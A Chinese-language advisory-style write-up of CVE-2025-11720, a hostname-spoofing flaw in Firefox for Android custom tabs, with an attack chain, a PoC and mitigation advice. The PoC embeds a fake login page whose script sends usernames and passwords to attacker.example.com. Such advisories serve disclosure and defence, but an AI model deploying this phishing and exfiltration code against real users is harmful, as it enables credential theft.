CVE-2025-11720 Firefox Android自定义标签页UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-11720

漏洞类型

UI欺骗/地址栏欺骗（URL/Hostname Spoofing）

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Mozilla Firefox 和 Firefox Focus（Android版）

漏洞概述

CVE-2025-11720是Mozilla Firefox及其Firefox Focus浏览器Android版本中自定义标签页（Custom Tabs）功能存在的一个UI欺骗漏洞。该漏洞由Mozilla安全团队发现，并于2025年10月14日公开披露，CVSS评分为8.1，属于高危级别。

该漏洞的核心问题在于，Firefox和Firefox Focus在Android平台上使用自定义标签页功能加载网页时，地址栏UI仅显示了加载内容的"站点名称"（site），而没有展示完整的域名（hostname）。这种简化显示方式为子域名欺骗攻击提供了可乘之机。攻击者可以将恶意内容托管在某个站点的子域名下，利用浏览器UI只显示主域名的特性，诱使用户误以为当前访问的内容来自该站点的另一个可信子域名，从而实施钓鱼攻击或欺骗用户输入敏感信息。

该漏洞的攻击向量为网络（AV:N），无需任何特权（PR:N），但需要用户进行某种交互（UI:R），如点击链接或打开特定页面。漏洞对机密性（C:H）和完整性（I:H）均产生高影响，但不影响可用性（A:N）。

此漏洞已在Firefox 144版本中修复，建议所有使用Firefox Android版本的用户尽快升级到最新版本以消除安全风险。该漏洞的CVE编号由[email protected]报告，并已在Mozilla官方安全公告mfsa2025-81中进行了说明。

技术细节

该漏洞的技术原理涉及Android平台自定义标签页（Custom Tabs）API与Firefox浏览器UI组件之间的交互问题。

**漏洞原理：**
在Android系统中，自定义标签页（Custom Tabs）是一种允许第三方应用以轻量级方式在应用内嵌入网页浏览功能的技术。Firefox Android版实现了自己的自定义标签页功能，但在URL显示逻辑上存在缺陷。当网页通过自定义标签页加载时，Firefox的UI组件仅提取并显示URL的"站点"部分（通常对应SSL证书中声明的站点名称或主域名），而不是完整的hostname（包含子域名部分）。

**利用方式：**
1. 攻击者首先在合法网站的某个子域名下托管恶意内容，例如在`evil.example.com`上部署钓鱼页面。
2. 攻击者通过钓鱼邮件、短信或其他社交工程手段，向受害者发送指向该子域名的链接。
3. 当受害者点击链接，Firefox的自定义标签页打开该URL时，地址栏仅显示`example.com`（主域名），而隐藏了`evil.`子域名部分。
4. 由于浏览器显示的是用户期望看到的主域名，受害者会误以为访问的是该站点的其他子页面（如`login.example.com`或`mail.example.com`），从而降低了警惕性。
5. 攻击者利用这种信任错觉，诱导用户输入凭据、个人信息或执行其他敏感操作。

**修复方案：**
Mozilla通过修改自定义标签页的UI显示逻辑，确保地址栏展示完整的hostname而非仅显示站点名称，从而使用户能够清晰辨别实际访问的完整URL。该修复已在Firefox 144版本中部署。

攻击链分析

STEP 1

步骤1：准备阶段

攻击者在目标合法站点的某个子域名下部署钓鱼页面或恶意内容。由于子域名通常可以由站点所有者自由配置，攻击者需要先获取目标站点的子域名控制权（如通过漏洞获取、DNS劫持或购买过期子域名）。

STEP 2

步骤2：制作钓鱼内容

攻击者制作一个模仿合法站点登录页面或敏感操作页面的钓鱼页面，设计上尽可能与原页面相似，以增加欺骗成功率。

STEP 3

步骤3：分发恶意链接

攻击者通过钓鱼邮件、短信、社交媒体或其他渠道，向目标用户发送指向恶意子域名的链接。链接本身看起来可能指向合法站点。

STEP 4

步骤4：触发漏洞

当用户使用Firefox Android版本点击链接时，自定义标签页功能会加载该URL。由于CVE-2025-11720漏洞，浏览器地址栏仅显示主域名（如example.com），而不显示完整的子域名（如evil.example.com）。

STEP 5

步骤5：用户受骗

用户看到地址栏显示的是期望的主域名，误以为访问的是合法站点的可信子页面，从而降低警惕心，按照页面的指示输入凭据、个人信息或执行其他敏感操作。

STEP 6

步骤6：数据窃取

攻击者通过钓鱼页面收集用户输入的敏感信息（如用户名、密码、个人信息等），并将其发送到攻击者控制的服务器，完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11720 PoC - Firefox Android Custom Tab Hostname Spoofing
# This PoC demonstrates the UI spoofing vulnerability where Firefox Android
# custom tab only displays the "site" name instead of the full hostname.

# Step 1: Attacker hosts malicious content on a subdomain of a legitimate site
# Example: A phishing page hosted at "evil.target-site.com"
# The legitimate site is "target-site.com"

# Step 2: Create a phishing page that mimics the legitimate site's login page
phishing_html = """
<!DOCTYPE html>
<html>
<head>
    <title>Login - Target Site</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; margin-top: 50px; }
        .login-form { max-width: 300px; margin: auto; padding: 20px; border: 1px solid #ccc; }
    </style>
</head>
<body>
    <h1>Welcome to Target Site</h1>
    <div class="login-form">
        <p>Please login to continue</p>
        <input type="text" placeholder="Username" id="username"><br><br>
        <input type="password" placeholder="Password" id="password"><br><br>
        <button onclick="exfiltrate()">Login</button>
    </div>
    <script>
        function exfiltrate() {
            var u = document.getElementById('username').value;
            var p = document.getElementById('password').value;
            // Send credentials to attacker-controlled server
            new Image().src = 'https://attacker.example.com/steal?u=' + u + '&p=' + p;
        }
    </script>
</body>
</html>
"""

# Step 3: Deploy the phishing page on attacker's subdomain
# Host the HTML content at: https://evil.target-site.com/login.html
# Note: This requires controlling a subdomain of the target site

# Step 4: Craft the attack link
attack_url = "https://evil.target-site.com/login.html"

# Step 5: Distribute the link via phishing email/SMS
# When victim clicks the link in Firefox Android:
# - The custom tab opens the URL
# - Due to CVE-2025-11720, the address bar shows "target-site.com"
# - Instead of the full hostname "evil.target-site.com"
# - Victim believes they are on a legitimate subdomain of target-site.com

# Step 6: Victim enters credentials thinking it's the legitimate site
# Credentials are sent to the attacker's server

print(f"Attack URL: {attack_url}")
print("Vulnerability: Firefox Android Custom Tab displays only 'site' name")
print("Expected display: 'target-site.com' (misleading)")
print("Actual hostname: 'evil.target-site.com' (hidden)")
print("Fixed in: Firefox 144")

影响范围

Mozilla Firefox for Android < 144

Mozilla Firefox Focus for Android < 144

防御指南

临时缓解措施

在无法立即升级Firefox的情况下，建议用户采取以下临时缓解措施：1）手动验证URL的完整性，在点击链接后仔细检查地址栏中显示的完整域名（包括子域名部分）；2）避免通过短信、邮件或社交媒体中的链接访问需要输入凭据的页面，改为直接在浏览器中输入网址或使用书签；3）启用Firefox的钓鱼和恶意软件保护功能；4）对任何要求输入敏感信息的页面保持高度警惕，即使地址栏显示的是熟悉的域名；5）考虑暂时使用其他浏览器（如Firefox桌面版或其他移动浏览器）访问敏感网站，直到升级到Firefox 144版本。